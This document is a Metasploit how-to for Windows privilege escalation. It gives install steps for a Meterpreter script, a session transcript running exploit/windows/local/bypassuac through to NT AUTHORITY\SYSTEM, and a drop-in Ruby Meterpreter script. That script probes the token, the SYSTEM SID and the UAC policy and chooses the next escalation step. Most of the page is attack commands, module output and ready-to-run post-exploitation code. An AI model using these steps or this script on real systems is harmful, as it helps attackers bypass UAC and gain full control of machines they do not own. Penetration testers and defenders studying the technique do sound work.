Metasploit - bypassuac

Download: checkpriv

Installation:

cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rb

meterpreter > run checkpriv
[*] Admin token: false
[*] Running as SYSTEM: false
[*] UAC Enabled: true
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
msf exploit(bypassuac) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 
SESSION => 
msf exploit(bypassuac) > run

[*] Started reverse handler on : 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable  bytes long being uploaded..
[*] Sending stage ( bytes) to 
[*] Meterpreter session  opened (: -> :) at -- :: +

meterpreter > getsystem
...got system via technique  (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run checkpriv
[*] Admin token: true
[*] Running as SYSTEM: true
[*] UAC Enabled: false
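The transcript above shows the three facts that decide the next move: whether the session holds an elevated (admin) token, whether it already runs as SYSTEM, and whether UAC is on and at which level. getsystem fails first because every technique it tries (named pipe impersonation, token duplication) needs an elevated token, and an Administrators member logged on under UAC only holds a filtered medium-integrity one; bypassuac spawns a high-integrity session, after which getsystem works. The Meterpreter script below is an added illustration of how such a probe can be written; it is not the checkpriv.rb linked on this page. It assumes the standard Meterpreter calls railgun shell32.IsUserAnAdmin, stdapi config.getsid and sys.registry, and the documented UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. The FakeClient stand-in, the fake_client helper and the sample SIDs and registry values are constructed so the logic can also be run outside a session.

```ruby
# Meterpreter script, added here to illustrate a checkpriv-style privilege
# probe. It is NOT the checkpriv.rb linked on this page.
# Assumed session API (standard Meterpreter/Metasploit calls):
#   client.railgun.shell32.IsUserAnAdmin     -> BOOL, false for a filtered admin token
#   client.sys.config.getsid                 -> SID string of the token user
#   client.sys.registry.open_key/query_value -> HKLM UAC policy values

# Registry key holding the UAC policy.
UAC_KEY = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'

# Standard Win32 constants; Meterpreter's stdapi already defines them inside a
# session, so they are only set here when the script runs outside one.
HKEY_LOCAL_MACHINE = 0x80000002 unless defined?(HKEY_LOCAL_MACHINE)
KEY_READ           = 0x20019    unless defined?(KEY_READ)

# Meaning of ConsentPromptBehaviorAdmin (documented UAC policy values).
CONSENT_LEVELS = {
  0 => 'Elevate without prompting',
  1 => 'Prompt for credentials on the secure desktop',
  2 => 'Prompt for consent on the secure desktop (Always notify)',
  3 => 'Prompt for credentials',
  4 => 'Prompt for consent',
  5 => 'Prompt for consent for non-Windows binaries (Default)',
}.freeze

# Read one REG_DWORD from the UAC policy key; nil if the value is absent
# (pre-Vista systems have no UAC policy key at all).
def read_uac_dword(client, name)
  key = client.sys.registry.open_key(HKEY_LOCAL_MACHINE, UAC_KEY, KEY_READ)
  key.query_value(name).data
rescue StandardError
  nil
ensure
  key.close if key
end

# Collect the facts checkpriv prints, plus the UAC level that bypassuac
# reports before deciding whether it can proceed.
def check_priv(client)
  enable_lua = read_uac_dword(client, 'EnableLUA')
  consent    = read_uac_dword(client, 'ConsentPromptBehaviorAdmin')
  {
    # false for an Administrators member whose token UAC has filtered down to
    # medium integrity; true only once the session holds an elevated token.
    admin_token: client.railgun.shell32.IsUserAnAdmin()['return'] == true,
    # S-1-5-18 is Local System on every locale; comparing getuid against
    # "NT AUTHORITY\\SYSTEM" breaks on non-English installs.
    system:      client.sys.config.getsid == 'S-1-5-18',
    uac_enabled: enable_lua == 1,
    consent:     consent,
    uac_level:   CONSENT_LEVELS.fetch(consent, 'Unknown'),
  }
end

# Map the probe result onto the steps shown in the transcript. Note that the
# probe cannot see Administrators group membership (a filtered token hides it);
# the bypassuac module checks that itself ("Part of Administrators group!").
def next_step(status)
  return :already_system if status[:system]
  return :getsystem      if status[:admin_token]     # elevated admin: pipe impersonation works
  return :not_admin      unless status[:uac_enabled] # UAC off yet unprivileged: no bypass helps
  case status[:consent]
  when 0 then :silent_elevation  # prompts are off: just launch an elevated process
  when 2 then :uac_always_notify # the bypassuac module refuses this level
  else        :bypassuac         # Default and other levels: bypassuac, then getsystem
  end
end

# --- Constructed stand-in for the session object (not part of Meterpreter) ---
# Mimics only the calls used above so the logic can be exercised offline.
FakeValue    = Struct.new(:data)
FakeKey      = Struct.new(:values) do
  def query_value(name)
    raise 'value not found' unless values.key?(name) # stands in for RequestError
    FakeValue.new(values[name])
  end
  def close; end
end
FakeRegistry = Struct.new(:key) do
  def open_key(_root, _path, _perm); key; end
end
FakeShell32  = Struct.new(:admin) do
  def IsUserAnAdmin; { 'return' => admin }; end
end
FakeRailgun  = Struct.new(:shell32)
FakeConfig   = Struct.new(:getsid)
FakeSys      = Struct.new(:config, :registry)
FakeClient   = Struct.new(:railgun, :sys)

def fake_client(admin:, sid:, values:)
  FakeClient.new(FakeRailgun.new(FakeShell32.new(admin)),
                 FakeSys.new(FakeConfig.new(sid), FakeRegistry.new(FakeKey.new(values))))
end

# Constructed states: a filtered admin before bypassuac, then SYSTEM after it.
BEFORE = fake_client(admin: false, sid: 'S-1-5-21-1-2-3-1001',
                     values: { 'EnableLUA' => 1, 'ConsentPromptBehaviorAdmin' => 5 })
AFTER  = fake_client(admin: true, sid: 'S-1-5-18',
                     values: { 'EnableLUA' => 1, 'ConsentPromptBehaviorAdmin' => 5 })

if defined?(client) && client # real session: behaves like `run checkpriv`
  s = check_priv(client)
  print_status("Admin token: #{s[:admin_token]}")
  print_status("Running as SYSTEM: #{s[:system]}")
  print_status("UAC Enabled: #{s[:uac_enabled]} (#{s[:uac_level]})")
  print_status("Next step: #{next_step(s)}")
else                          # plain ruby: walk the two constructed states
  [BEFORE, AFTER].each { |c| s = check_priv(c); puts "#{s} -> #{next_step(s)}" }
end
```

Dropped into scripts/meterpreter/ it runs with `run` exactly like checkpriv on this page. Two caveats: IsUserAnAdmin answers false for the filtered token of an Administrators member, which is why the page shows "Admin token: false" immediately before bypassuac succeeds; and this illustration reads the machine-wide UAC policy, which does not change when the session elevates, so its third line stays true where the page's checkpriv prints "UAC Enabled: false" once SYSTEM. The value that actually flips with elevation is the admin token.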